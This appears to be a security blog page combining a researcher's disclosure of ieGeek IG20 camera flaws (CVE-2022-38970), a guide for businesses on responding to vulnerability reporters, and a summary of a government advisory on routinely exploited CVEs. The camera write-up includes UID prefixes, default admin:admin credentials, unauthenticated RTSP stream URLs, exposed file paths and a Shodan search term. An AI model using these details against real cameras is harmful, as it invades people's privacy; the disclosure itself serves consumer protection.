Saturday, March 2, 2024
Home Blog

ieGeek IG20 CCTV Multiple Vulnerabilities – CVE-2022-38970

6

Amazon’s “highly rated”, “recommended” ieGeek brand continues to present a number of security vulnerabilities.

ieGeek Security Vulnerabilities

On the 19th of Aug 2022 I set out to purchase a CCTV Camera from Amazon, I read over the reviews of the ieGeek IG20, and it seemed great, the value too. For just £29.99 I’d get myself a great looking CCTV Camera, packed full of features. It has night vision, Smartphone access, Motion Detection, Plug & Play, It’s waterproof and it can connect via WiFi or Ethernet. Great, I was sold. However, I failed to do any research on the brand specifically.

The camera arrived the following day, and later that day I got around to setting it up. I first noticed that on the back of the camera, there was a sticker with a UID printed, along with a Factory default Username & Password combination, consisting of admin/admin.

ieGeek IG20 Issues/Vulnerabilities

UID Weakness CWE-340 – CVE-2022-38970

The UID is predictable. The UID in our case will look like this: AAFF-123456-ABCDE – depending on the make and model.

  • UID p1: Same 4 letters at the start.
  • UID p2: 6 numbers at random in the middle.
  • UID p3: 5 random letters at the end.

Evidently, having just this basic knowledge of the UID and using the default credentials, the camera feed could be accessed using the software provided by ieGeek from their website by testing each UID value. This can leave a number of IP cameras vulnerable to unauthorised viewing with the privacy of users at risk.

Below are some more vulnerable prefixes running the same vulnerable firmware.

AAAAAABBAACCAAESAIPC
AAFFBBBBCAMCAMERACCCC
DDDDDEAAEEEEELSAELSO
ESCMESNESSEUAEYE
FCAREFDTAAFFFFFOUSGCAM
GCMNGGGGGKWHHHHHRXJ
HSLHVCHWAAHZDHZDA
HZDBHZDCHZDNHZDXHZDY
HZDZIIIIISRPJWEVMCI
MDIMEIAMMMMMSEMSI
MTENIPNNNNNTPOBJ
PHPPISRPOLIPPCNPPPP
PTPQSHVROSSSECRUISPCN
SSAASSSSSURESXHTTTT
UUUUVIEWVSTAVSTBVSTC
VSTDVSTFWCAMWGKJWHI
WNRWNSWNVWWWWWXH
WXOXCPTPXHAXLTXWL
ZLDZZZZAVA

Unauthenticated / Default auth access to camera stream via RTSP protocol CWE-284

By default, one can easily access the camera’s stream externally or internally depending on your router/network configuration, with our without means of Authentication.

  • Zero Authentication: rtsp://+IP+/11
  • Default Auth: rtsp://admin:admin@+IP+/11

Replace +IP+ with your local or external IP.

Here is a screenshot of the Default RTSP settings, requiring Zero authentication.

Default P2P Camera feed activated and sent to a server in plaintext CWE-284

The cloud function of the camera uses the P2P protocol to send and make requests back to a server based in China in plaintext. It was found that all connections back to this were made in plaintext regardless of protocol, this includes the viewing of the camera’s stream and control. HTTPS was not found to be implemented anywhere on the camera.

Access to files stored on the camera CWE-284

The following directories can be viewed using the default login:

  • http://+IP+/tmpfs
  • http://+IP+/js
  • http://+IP+/lib
  • http://+IP+/log
  • http://+IP+/resources
  • http://+IP+/sd
  • http://+IP+/swfs

The number of links discovered showed that the SD card, log files and website front-end code were accessible from the web interface. This includes any footage that has been recorded by the device and stored on the external SD card.

I decided to check out shodan.io and searched for “hipcam realserver”. Shodan is a Google like database of Connected Devices, if you like. It produced 93,312 results of addresses that had port 554 exposed to the internet. As I browsed these I also discovered a number of addresses that also had Port 80 exposed, hosting the same ‘IP Camera’ front page with login. With what I have discovered it is possible for each of these devices to be accessed via default credentials, or if the admin credentials are changed, Using VLC player, I could potentially connect to each of these camera streams without the need to authenticate.

Admin Panel – Basic Authentication in use / Weak Password Requirements CWE-521 / CWE-287

When the camera is booted up, a web server is spawned and requires a login to gain access. Default credentials were then used to gain access and there was no setup to force change of the default password in place. Burpsuite caught this login process; the session was found to be using HTTP Basic Authentication to handle the username and password. The Base64 translates to admin:admin.

cve-2022-38970

JavaScript injection (DOM-based) CWE-79

Data is read from document.cookie and passed to eval()


var strCookie=document.cookie;
var arrCookie=strCookie.split('; ');
var arr=arrCookie[i].split('=');
return unescape(arr[1]);
var cooktype=getcookie('cookmun');
var string = eval("'cgi-bin/hi3510/param.cgi?cmd=setimageattr&-image_type="+cooktype+"&-default=on'");

Using various different methods of escaping. Stored XSS was also prevalent in many places within the admin panel that used user input. Example: FTP Upload settings.

HTTP Response Header Injection/Splitting CWE-644

The web application is also evidently vulnerable to HTTP response header injection, see PoC below. This also led me to discover i was able to break out of the response.

Your options for exploitation vary depending on the type of response you’re injected into and also where in the response you’re placed!

Here we’ve added a “malicious cookie” which will be set in the browser. As mentioned earlier i was also able to break into the body, or out of the headers through double CRLFs (%0d%0a%0d%0a) see below.

When user input is insecurely inserted into the headers of server responses, HTTP Header Injection vulnerabilities are created. They are based on the theory that an attacker can make the server generate a response that contains carriage-return and line-feed characters (or, respectively, %0D and %0A in their URI encoded forms), within the server response header, and/or that the attacker may be able to add specially created headers. Attacks like response splitting, session fixation, cross-site scripting, and malicious redirection are all possible using header injection.

Often, the injection of headers is not the main attack; rather, it is merely a method for accessing or exploiting another flaw. For instance, if a hacker is able to inject a payload through HTTP header injection, they may target a website that is susceptible to cross-site scripting in the Referer header or in a cookie value etc.

Device NMAP scan

Starting Nmap 7.80 ( https://nmap.org ) at 2022-08-28 00:42 BST
Nmap scan report for 192.168.1.116
Host is up (0.0088s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
80/tcp   open  http Hipcam RealServer/V1.0
554/tcp  open  rtsp
1935/tcp open  rtmp Real-Time Messaging Protocol
8080/tcp open  http-proxy ONVIFservice
MAC X (Shenzhentong BO Weitechnology) SHENZHEN TONG BO WEI TECHNOLOGY Co.,LTD
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Network Distance: 1 hop
 

Anyway, I decided enough is enough with this trash device and unplugged it from my network, packaged it back up and arranged a return with Amazon.

The Listing On Amazon

At the time of writing, the listing is still available, however, I reached out to Amazon and made them fully aware of everything, including my intention to publish this article, and they advised me that the product listing would be “temporarily” removed today, 28th Aug 2022, pending further Investigation.
The listing can be seen here [if still available]

It has to be worth noting, that there was an investigation by Which.co.uk see reference [3] in July 2021, that details a line of similar flaws, consequently, Amazon removed the said ieGeek branded camera from sale on its website. The which? investigation revealed another device from the same manufacturer can be easily hacked by cybercriminals.

The £40 camera, which was labelled Amazon’s Choice, had more than 8,500 reviews (as of June 22 2021), including 68% giving the full five stars.

If you own the ieGeek Security Outdoor Camera 1080p, you should change its default password immediately, or better still, stop using it.

https://www.which.co.uk/news/article/iegeek-security-camera-removed-from-sale-following-which-investigation-ajW4t0g7bnGj

So the question remains, why do Amazon allow Manufacturers to list products irrelevant of the manufacturer having been Flagged, and Delisted in the past? A better system needs to be in place. Yes, I understand there can be a new line of products/models but surely amazon should be seen to be doing more to prevent devices like this from appearing on their website. The privacy and security of their customers should be paramount.

Update 01 Sep 2022 – Product Still Listed On Amazon

We’ve noted that the product is still available to purchase on Amazon, despite us being told that it would be removed, pending an investigation. We figured we’d add a screenshot, just for clarity.

Here is the screenshot of a mail I received from the Amazon Representative on the 28th of August, this email states the item “may be temporarily unavailable”, which contradicts what she told me on the telephone. This email arrived in my mailbox very shortly after I had a call with the same lady, Roxy.

iegeek security

Update: 01 Sep 2022

We’ve been made aware of another article from Which.co.uk, this second article was published in late 2021, after the earlier-mentioned article. Their second write-up clearly paints a very different picture, one could easily say it’s misleading given what has been uncovered in this report. It has to be worth mentioning that my ieGeek device, and probably many many others, was still running the same vulnerability-ridden firmware that Which.co.uk spoke out against in their first write-up, as has been verified by the team here at risec and elsewhere. There was no obvious offer of any firmware upgrade, at least to my knowledge. Anyway, see some quotes from the second write-up below.

Millions of CamHi wireless cameras made more secure after hacking risk

Following a change by HiChip, all CamHi app devices when installed now must have their default password changed by the user.

HiChip has agreed to enforce a strong password policy, particularly blocking generic terms such as ‘password’ and ‘admin’.

For CamHi devices that are already set up in people’s homes, the app will remind them to change the default password and warn them if what they have chosen is weak

MISLEADING: https://www.which.co.uk/news/article/millions-of-camhi-wireless-cameras-made-more-secure-after-hacking-risk-aezzW2u2ELsl

We have reached out to Which.co.uk and have yet to receive any notable response.

Consumer Recommendations

If you value your privacy, and security as much as we do, please remove the device from service. It is simply unfit for purpose. If you bought it from Amazon, go and arrange a return as this device is in clear breach of their merchant conditions.

Research each device thoroughly before buying, and check it’s security reputation.

Be Aware: Endless numbers of IP cameras of other Brands also use the Hipcam RealServer service; I am unable to check the configuration of these devices specifically, but one would be led to believe they are all implemented similarly. Sadly, there doesn’t seem to be a method to warn anyone utilising these IP Cameras that they are exposed.

On a final note, take amazon’s reviews with a pinch of salt, and always do your homework. Next time your about to purchase a connected device, IoT(Internet-of-Things), do a quick google query, something like, “vulnerable BRAND” or “exploit BRAND”

Q&A

Are ieGeek cameras secure?

According to our research, and many others, ieGeek cameras are not secure. The devices they seem to be pushing out in 2022 are vulnerable in a number of ways as detailed in this article. Fundamentally, they lack proper encryption, and, are shipped to consumers riddled with security holes. One can only ask themselves, is it intentional? tldr; Given the research of the team here at RiSec, and research conducted elsewhere, we can categorically say ieGeek’s cameras are not secure in 2022.

What are the real risks of ieGeek cameras?

By using these devices that lack proper safety and security standards, your private data is at serious risk of being exposed, a bad actor may able to gain complete control of the cameras. This fundamentally opens up your entire network to further attack, making it much easier for a bad actor to reach an end goal.

Cheap CCTV cameras tend to be vulnerable to at least one of the following types of hacking:

  1. They have a weak default password and username setting, which can be easily discoverable. If the user doesn’t change those settings, it’s very easy for hackers to find their way into your camera control system, in every case, there is no prompt in the Admin panel when logging in, advising you to chase any password.
  2. They don’t encrypt your data so that your home router password input is un-encrypted and accessible to any cyber attacker, or themselves.., same applies with any SMTP email info provided, along with any FTP info provided to the device. By using the home router password, they can gain access to other devices on your home network, can monitor your Internet history and any stored data on connected devices.
  3. They let external users gain root access to the device itself, allowing hackers to take control, launch attacks from your device, and exfiltrate data.

Cheap CCTV Invites Outside Threats Into Your Home[4]

There are three main security issues you need to look for when buying your CCTV camera. Popular wireless security camera brands that are sold on online marketplaces like Amazon, but also eBay share common security flaws.

As a rule of thumb, brands that are not well-known outside of the online market should be avoided at all cost. Affordable CCTV solutions from Shenzhen-based factories in China sometimes fail to meet wireless safety standards.

Brands that have been tested for vulnerability and that you should avoid are the following; ieGeek, Sricam, SV3C, and Vstarcam. All come with a friendly price tag, but they are quick to join the list of CCTV cameras that put your privacy and security at risk.

Tested by a professional security lab, Context Information Security, “cheap CCTV cameras show that they fail to prioritise customers’ security even those that are bestsellers in online marketplaces”

[4]

Update: 21/09/2022 – After some back-and-forth correspondence with the vendor, ieGeek, they have disputed that the ieGeek IG20 is an insecure device, despite our evidence to the contrary, they also cited an invalid misleading Which.co.uk[5] post as seen above.

CVE Approved: CVE-2022-38970[6]

Update: 22/07/2023 – Product still widely available on Amazon.


Got some crazy story or thoughts on this article? We’d love to hear from you below!

Coming up next, I will be covering a Chinese “Mini-PC” that was shipped to me loaded with Malware.

Ciao, for now.

References

Amazon product listing[1]

IG20 ieGeek store page[2]

Which investigation ieGeek[3]

Cheap CCTV Sold With Known Vulnerabilities[4]

Which.co.uk Misleading[5]

CVE-2022-38970[6]


Cybersecurity Knowledge Base

Latest InfoSec News

Cybersecurity Academy

Go to Homepage

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for our Weekly Cybersecurity Newsletter Today.

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
ClosePlease login

A Security Researcher Contacted Me – What should I do?

0
security researcher contacted me

Businesses say that they take the security of customer data seriously but, when presented with a vulnerability, are often more concerned about their own reputation than the security of their customers.

Handle disclosure correctly and you can do both: protect your customers and protect your reputation. Do it wrong and you damage both.

By far the most painful part of vulnerability research is responsible disclosure. If we find something bad in a smart thing, it would be fairly irresponsible to publish a method to do bad things without giving the manufacturer/developer/vendor/service provider a fair chance to fix it first.

But in order for them to fix it, we need to safely and securely get the information to them first.

Some manufacturers have published the method by which the security team can be contacted. That makes life really straightforward for both us and them, a very common method of making researchers aware of your disclosure process is by leaving a security.txt file in the root of your domain.

However, many people don’t have a clue what a security vulnerability is, let alone a security researcher.

Vulnerability Disclosure

First Contact

We’ll try email addresses initially: ‘contact us’ details on your website, maybe security@<yourdomain>, we may even attempt to call.

It will be a simple email asking how we disclose a security vulnerability. We won’t disclose the exact vulnerability at this stage, but we usually explain the consequences of it. I’ve also started adding a sentence explaining that the email should be forwarded to the internal security team or to a director/VP of the business. I appreciate that a customer service operator looking after inbound customer enquiries may not be equipped to deal with a security vulnerability report.

Whatever you do, don’t ignore this email. Respond immediately to prevent the issue from escalating.

Failing to respond as a matter of urgency will likely result in a coordinated public disclosure via a program such as https://www.openbugbounty.org/

Here’s some content that you might consider replying with:

Thanks for your email. We are investigating this as a matter of urgency.

Would you like our PGP key to encrypt communications, or would you prefer another method of securing our discussion?

Could you be available for a call?

Communicating is critical. If you ignore the report, you will antagonise the researcher. It is often frustration with vendor communications that leads researchers to publish vulnerabilities publicly.

Briefing Your Staff

It’s so hard for a customer contact centre operator to handle a security report correctly. You need to ensure that certain keywords are flagged so that you can intercept or ensure these communications are escalated.

This is the most common screw-up by far – the researcher tries to make contact, yet no-one listens because they don’t understand the report and don’t know what to do with it.

Out of sheer frustration, the researcher makes public contact on social media. Others may be alert to this, particularly sections of the security media. As a result, all eyes are already on your business and the potential security flaw.

Social media is often used as an initial contact point by researchers. Is your social media agency briefed? So much damage can be done to your brand by a social media agent who doesn’t know how to respond to a researcher.

Some businesses publish details of their press office, often also an outsourced media agency. Researchers may contact these, so ensure that you have an escalation process when a third-party agency is involved.

Making Contact Easy

Create an email address of security@<yourdomain> and MONITOR it. Ensure those emails get straight to your security team.

Publish details of how you would like to be contacted at www.yourdomain.com/security.txt

Publish a vulnerability disclosure policy on your website too. There’s some great guidance

US: https://www.ntia.doc.gov/files/ntia/publications/ntia_vuln_disclosure_early_stage_template.pdf

UK: https://www.ncsc.gov.uk/information/vulnerability-disclosure-toolkit

Accepting Constructive Criticism

It can be very difficult for a business to accept an alert that their security isn’t up to standard. Common reactions to perceived criticism are denial, anger and aggression towards the researcher.

THESE ARE NOT HELPFUL and will generally make the situation worse.

Consider for a moment the motivations of the researcher:

  • They’ve often done the work in their own time for little to no reward or payment.
  • They are generally trying to make security better.
  • If they were just trying to embarrass you, hack you or have others hack you, they wouldn’t have contacted you at all

It’s rare that researchers ‘go too far’ and access data that they shouldn’t have. Therefore, threatening a researcher with legal action is likely to result in media attention and cause significant, needless damage to your brand. The Streisand Effect.

That said, there are times when less ethical researchers do copy excess data, far more than was necessary to prove the vulnerability. In those very rare cases, it’s time to get legal advice.

Careful negotiation can defuse most situations and result in data being deleted/returned and no reputational harm occurring.

We’ve had a crazy range of responses over the years from vendors:

“Are you trying to sell me something?”

No, we’re trying to tell you about a security vulnerability!

“The product is end of life. We don’t care”

“Are you working for our competitor?”

“Cease & Desist”

“We’ve had no reports of our product being hacked before”

“Without a support contract, we cannot accept your report”

“We don’t consider that to be a vulnerability”

So, take the report constructively. Acknowledge that someone at your business or in your supply chain may have screwed up. Don’t shoot the messenger.

Fixing The Vulnerability

So far, all we’ve discussed is how to respond. It’s also important to manage the process of actually fixing the bug.

Accepted practice usually results in public disclosure 90 days after first contact, unless the bug is fixed sooner.

Simply stating that ‘you’ll look into it’, or ‘will fix it at the next release’ isn’t good enough.

You will need to commit to a timeline to investigate, plan and release a fix.

Researchers understand that vulnerabilities can be complex to fix. If you communicate regularly with the researcher, they can see that you are serious about fixing the issues.

However, simply stating that it’s going to take longer than expected isn’t enough. Why is it taking longer than expected? Can you implement a workaround that solves the problem temporarily?

If the researcher feels that you aren’t taking the vulnerability seriously enough, or committing enough resource, you risk antagonising them. Uncoordinated public disclosure may result.

Remember: they are helping you protect your customers data.

Bug Bounty

Some researchers will ask if you have a bug bounty scheme, where the business offers reward payments to security researchers as a ‘thankyou’ for their findings.

If you don’t have a scheme, don’t try to rush one through for this one researcher.

Many researchers will be happy to receive a ‘thanks’, public credit for the finding once fixed and maybe you could send them some ‘swag’.

A suitable ‘swag’ gesture may be related to your business: a t-shirt, a mug, maybe even some free credit for your service.

If you make smart devices, how about sending a couple to the researcher? Having them ‘on side’ for the future may even get some new vulnerabilities found for you.

Keep marketing & PR out of initial discussions

I worked in marketing for a while. Ones first instinct is to protect the brand at all costs. This is unlikely to end well.

You will be publicly judged on your response to the security report. If you handle it well, you will be seen as a cool vendor who really does take security seriously and works to protect customer data.

If you handle it badly (saying ‘we take security seriously’ is a no-no BTW) you will attract the interest of other researchers, less ethical hackers and the media.

You protect your brand better by engaging with the researcher. Take external advice from specialist cyber incident management firms if you feel ill-equipped to deal with this process.

There will be a time for a public statement to be made, at which point you will need your PR and marketing specialists.

My advice for your statement:

  • Do NOT attempt to play down the significance of the vulnerability just to protect your brand. This will go wrong
  • If you do feel that the researcher hasn’t understood mitigating factors, explain them clearly
  • Explain what you’ve done to mitigate this and future issues. Have you re-trained your developers or maybe changed your supplier?
  • Detail what you’ve done to protect customers going forward
  • Thank the researcher and credit them publicly

We’ve had initial vulnerability reports intercepted and handled by an outsourced PR agency. This went sideways fast. Fortunately, the vendor’s IT security chief realised and stepped in just before matters got out of hand.

Reminder: Keep PR and marketing out of initial discussions.

How bad is it?

Once you’ve established a dialogue with the researcher, it’s time to understand the vulnerability and its significance.

What does it affect? What is the method? What requests / parameters / data are affected?

Is there any evidence of data having been previously compromised (this is only relevant if there is evidence and you will need to consider mandatory breach notification / DPA reporting).

What’s the worst case scenario? What in their opinion is the best case?

What is the advice of the researcher for fixing the vulnerability? Don’t ask for too much advice; it’s not as if you’re paying for it!

Who are you dealing with?

Search online; research the vulnerability researcher. Find out who you are dealing with.

If their name is available, you may be able to find other vulnerability reports they’ve made.

Is this a kid, or is it someone well known in the industry? Does the researcher have a media presence?

If they are well known in the security research community, they are more likely to follow a recognised process with vulnerability reporting and disclosure. They have an ethical reputation to protect too.

If they aren’t well known or you can’t determine who they are, you will have to manage the process more carefully: Ask clearly what they would like to happen and what steps they would like to take.

Non-Disclosure Agreements

I strongly caution against requiring a non-disclosure agreement, unless the researcher suggests one, or a significant bug bounty is to be paid.

Attempting to silence a researcher is a very bad idea. They will want to tell the story of the cool vulnerability they found and the cool vendor who fixed it.

Or they will just go public and talk about the uncool vendor who tried to slap them down with an NDA.

A couple of scenarios

Here’s one that went well: https://www.pentestpartners.com/security-blog/pwning-a-siemens-scalance-ics-switch-through-arm-reversing/

Siemens had a vulnerability reporting process, acknowledged the report quickly, kept in touch, asked for a little more time as the bug was larger than we thought, fixed it, informed customers, and credited us.

And here’s one that went badly: https://www.pentestpartners.com/security-blog/flir-fx-lorex-video-stream-hijack-disclosure-train-wreck/

The vendor failed to respond promptly, failed to address the issue quickly, sent out a factually incorrect press statement and ended up damaging their reputation in the media.

Be like Siemens. Be a cool vendor.

Some useful resources:

https://www.owasp.org/index.php/Vulnerability_Disclosure_Cheat_Sheet

https://www.iso.org/standard/72311.html

Summary

Make it easy for security researchers to contact you.

Accept their reports in good faith and act on them.

Over-communicate with the researcher.

Coordinate disclosure with the researcher.

Caveat

So, that’s vulnerability disclosure covered. However, you may be approached by a security researcher or hacker who claims that they’ve either found your customer data online, or have it in their possession.

In this case it’s possible that you may have already been breached, so a different course of action may be required.

First, call your insurer. If you take action without their input, you may void your cover. Specialist cyber insurers also have access to incident response firms who can help you manage a potential breach. There may be regulatory reporting requirements also, particularly in light of GDPR.

Suggest an edit to this article

Go to Cybersecurity Knowledge Base

Got to the Latest Cybersecurity News

Go to Cybersecurity Academy

Go to Homepage

source

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for our Weekly Cybersecurity Newsletter Today.

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
ClosePlease login

Top Vulnerabilities Exploited in 2022 as revealed by FBI, CISA, and NSA

0
Cisa adds new exploits

The year 2022 witnessed a surge in cyberattacks by malicious actors targeting unpatched, internet-facing systems. In a joint Cybersecurity Advisory (CSA), top cybersecurity agencies from the United States, Australia, Canada, New Zealand, and the United Kingdom highlighted the most frequently exploited Common Vulnerabilities and Exposures (CVEs) and Common Weakness Enumeration(s) (CWE) to shed light on the prevailing threats. This article provides an overview of the key findings and recommendations from the CSA to help organizations strengthen their cybersecurity defenses.

Key Findings

The CSA report outlined several key findings that offer insight into the strategies adopted by malicious cyber actors in 2022

Exploitation of Older Software Vulnerabilities: Malicious actors exploited older software vulnerabilities more frequently than recently disclosed ones. Proof of concept (PoC) codes for these vulnerabilities were publicly available, making it easier for a broader range of attackers to carry out cyber-attacks.

Timely Patching Reduces Vulnerabilities: Malicious actors have the most success exploiting known vulnerabilities within the first two years of public disclosure. Timely patching decreases the efficacy of these vulnerabilities, forcing attackers to employ more complex and costly methods.

Prioritizing Severe and Global Vulnerabilities: Cyber attackers targeted severe and globally prevalent CVEs, as well as those more prevalent in specific target networks, allowing them to achieve high-impact results with minimal resources.

Top Routinely Exploited Vulnerabilities

Top Routinely Exploited Vulnerabilities

Table 1 shows the top 12 vulnerabilities the co-authors observed malicious cyber actors routinely exploiting in 2022:

  • CVE-2018-13379This vulnerability, affecting Fortinet SSL VPNs, was also routinely exploited in 2020 and 2021. The continued exploitation indicates that many organizations failed to patch software in a timely manner and remain vulnerable to malicious cyber actors.
  • CVE-2021-34473CVE-2021-31207CVE-2021-34523. These vulnerabilities, known as ProxyShell, affect Microsoft Exchange email servers. In combination, successful exploitation enables a remote actor to execute arbitrary code. These vulnerabilities reside within the Microsoft Client Access Service (CAS), which typically runs on port 443 in Microsoft Internet Information Services (IIS) (e.g., Microsoft’s web server). CAS is commonly exposed to the internet to enable users to access their email via mobile devices and web browsers.
  • CVE-2021-40539. This vulnerability enables unauthenticated remote code execution (RCE) in Zoho ManageEngine ADSelfService Plus and was linked to the usage of an outdated third-party dependency. Initial exploitation of this vulnerability began in late 2021 and continued throughout 2022.
  • CVE-2021-26084. This vulnerability, affecting Atlassian Confluence Server and Data Center (a web-based collaboration tool used by governments and private companies) could enable an unauthenticated cyber actor to execute arbitrary code on vulnerable systems. This vulnerability quickly became one of the most routinely exploited vulnerabilities after a PoC was released within a week of its disclosure. Attempted mass exploitation of this vulnerability was observed in September 2021.
  • CVE-2021- 44228. This vulnerability, known as Log4Shell, affects Apache’s Log4j library, an open-source logging framework incorporated into thousands of products worldwide. An actor can exploit this vulnerability by submitting a specially crafted request to a vulnerable system, causing the execution of arbitrary code. The request allows a cyber actor to take full control of a system. The actor can then steal information, launch ransomware, or conduct other malicious activity.[1] Malicious cyber actors began exploiting the vulnerability after it was publicly disclosed in December 2021, and continued to show high interest in CVE-2021- 44228 through the first half of 2022.
  • CVE-2022-22954CVE-2022-22960. These vulnerabilities allow RCE, privilege escalation, and authentication bypass in VMware Workspace ONE Access, Identity Manager, and other VMware products. A malicious cyber actor with network access could trigger a server-side template injection that may result in remote code executionExploitation of CVE-2022-22954 and CVE-2022-22960 began in early 2022 and attempts continued throughout the remainder of the year.
  • CVE-2022-1388. This vulnerability allows unauthenticated malicious cyber actors to bypass iControl REST authentication on F5 BIG-IP application delivery and security software.
  • CVE-2022-30190. This vulnerability impacts the Microsoft Support Diagnostic Tool (MSDT) in Windows. A remote, unauthenticated cyber actor could exploit this vulnerability to take control of an affected system.
  • CVE-2022-26134. This critical RCE vulnerability affects Atlassian Confluence and Data Center. The vulnerability, which was likely initially exploited as a zero-day before public disclosure in June 2022, is related to an older Confluence vulnerability (CVE-2021-26084), which cyber actors also exploited in 2022.
CVEVendorProductTypeCWE
CVE-2018-13379FortinetFortiOS and FortiProxySSL VPN credential exposureCWE-22 Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
CVE-2021-34473(Proxy Shell)MicrosoftExchange ServerRCECWE-918 Server-Side Request Forgery (SSRF)
CVE-2021-31207(Proxy Shell)MicrosoftExchange ServerSecurity Feature BypassCWE-22 Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
CVE-2021-34523(Proxy Shell)MicrosoftExchange ServerElevation of PrivilegeCWE-287 Improper Authentication
CVE-2021-40539Zoho ManageEngineADSelfService PlusRCE/Authentication BypassCWE-287 Improper Authentication
CVE-2021-26084AtlassianConfluence Server and Data CenterArbitrary code executionCWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component (‘Injection’)
CVE-2021- 44228(Log4Shell)ApacheLog4j2RCECWE-917 Improper Neutralization of Special Elements used in an Expression Language Statement (‘Expression Language Injection’) CWE-20 Improper Input Validation CWE-400 Uncontrolled Resource Consumption CWE-502 Deserialization of Untrusted Data
CVE-2022-22954VMwareWorkspace ONE Access and Identity ManagerRCECWE-94 Improper Control of Generation of Code (‘Code Injection’)
CVE-2022-22960VMwareWorkspace ONE Access, Identity Manager, and vRealize AutomationImproper Privilege ManagementCWE-269 Improper Privilege Management
CVE-2022-1388F5 NetworksBIG-IPMissing Authentication VulnerabilityCWE-306 Missing Authentication for Critical Function
CVE-2022-30190MicrosoftMultiple ProductsRCENone Listed
CVE-2022-26134AtlassianConfluence Server and Data CenterRCECWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component (‘Injection’)

Additional Routinely Exploited Vulnerabilities

In addition to the 12 vulnerabilities listed in Table 1, the authoring agencies identified vulnerabilities—listed in Table 2—that were also routinely exploited by malicious cyber actors in 2022.

CVEVendorProductTypeCWE
CVE-2017-0199MicrosoftMultiple ProductsArbitrary Code ExecutionNone Listed
CVE-2017-11882MicrosoftExchange ServerArbitrary Code ExecutionCWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer
CVE-2019-11510IvantiPulse Secure Pulse Connect SecureArbitrary File ReadingCWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
CVE-2019-0708MicrosoftRemote Desktop ServicesRCECWE-416: Use After Free
CVE-2019-19781CitrixApplication Delivery Controller and GatewayArbitrary Code ExecutionCWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
CVE-2020-5902F5 NetworksBIG-IPRCECWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
CVE-2020-1472MicrosoftMultiple ProductsPrivilege EscalationCWE-330: Use of Insufficiently Random Values
CVE-2020-14882OracleWebLogic ServerRCENone Listed
CVE-2020-14883OracleWebLogic ServerRCENone Listed
CVE-2021-20016SonicWALLSSLVPN SMA100SQL InjectionCWE-89: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)
CVE-2021-26855(ProxyLogon)MicrosoftExchange ServerRCECWE-918: Server-Side Request Forgery (SSRF)
CVE-2021-27065(ProxyLogon)MicrosoftExchange ServerRCECWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
CVE-2021-26858(ProxyLogon)MicrosoftExchange ServerRCENone Listed
CVE-2021-26857(ProxyLogon)MicrosoftExchange ServerRCECWE-502: Deserialization of Untrusted Data
CVE-2021-20021SonicWALLEmail SecurityPrivilege Escalation Exploit ChainCWE-269: Improper Privilege Management
CVE-2021-40438ApacheHTTP ServerServer-Side Request ForgeryCWE-918: Server-Side Request Forgery (SSRF)
CVE-2021-41773ApacheHTTP ServerServer Path Traversal CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
CVE-2021-42013ApacheHTTP ServerServer Path Traversal CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
CVE-2021-20038SonicWallSMA 100 Series AppliancesStack-based Buffer OverflowCWE-787: Out-of-bounds WriteCWE-121: Stack-based Buffer Overflow
CVE-2021-45046ApacheLog4jRCECWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement (‘Expression Language Injection’)
CVE-2022-42475FortinetFortiOSHeap-based Buffer OverflowCWE-787: Out-of-bounds Write
CVE-2022-24682ZimbraCollaboration Suite‘Cross-site Scripting’CWE-79: Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)
CVE-2022-22536SAPInternet Communication Manager (ICM)HTTP Request SmugglingCWE-444: Inconsistent Interpretation of HTTP Requests (‘HTTP Request/Response Smuggling’)
CVE-2022-22963VMware TanzuSpring CloudRCECWE-94: Improper Control of Generation of Code (‘Code Injection’)CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement (‘Expression Language Injection’)
CVE-2022-29464WSO2Multiple ProductsRCECWE-434: Unrestricted Upload of File with Dangerous Type
CVE-2022-27924ZimbraZimbra Collaboration SuiteCommand InjectionCWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component (‘Injection’)
CVE-2022-22047MicrosoftWindows CSRSSElevation of PrivilegeCWE-269: Improper Privilege Management
CVE-2022-27593QNAPQNAP NASExternally Controlled ReferenceCWE-610: Externally Controlled Reference to a Resource in Another Sphere
CVE-2022-41082MicrosoftExchange ServerPrivilege EscalationNone Listed
CVE-2022-40684FortinetFortiOS, FortiProxy, FortiSwitchManagerAuthentication BypassCWE-306: Missing Authentication for Critical Function

Mitigations: Best Practices for Vendors, Developers, and End-User Organizations

The report emphasized the need for collaboration and proactive measures from both vendors and end-user organizations to counter cyber threats effectively. Here are the recommended mitigations:

For Vendors and Developers

Identify Vulnerability Classes: Perform an analysis of CVEs and known exploited vulnerabilities to identify frequently targeted classes of vulnerabilities. Implement appropriate mitigations to eliminate these classes.

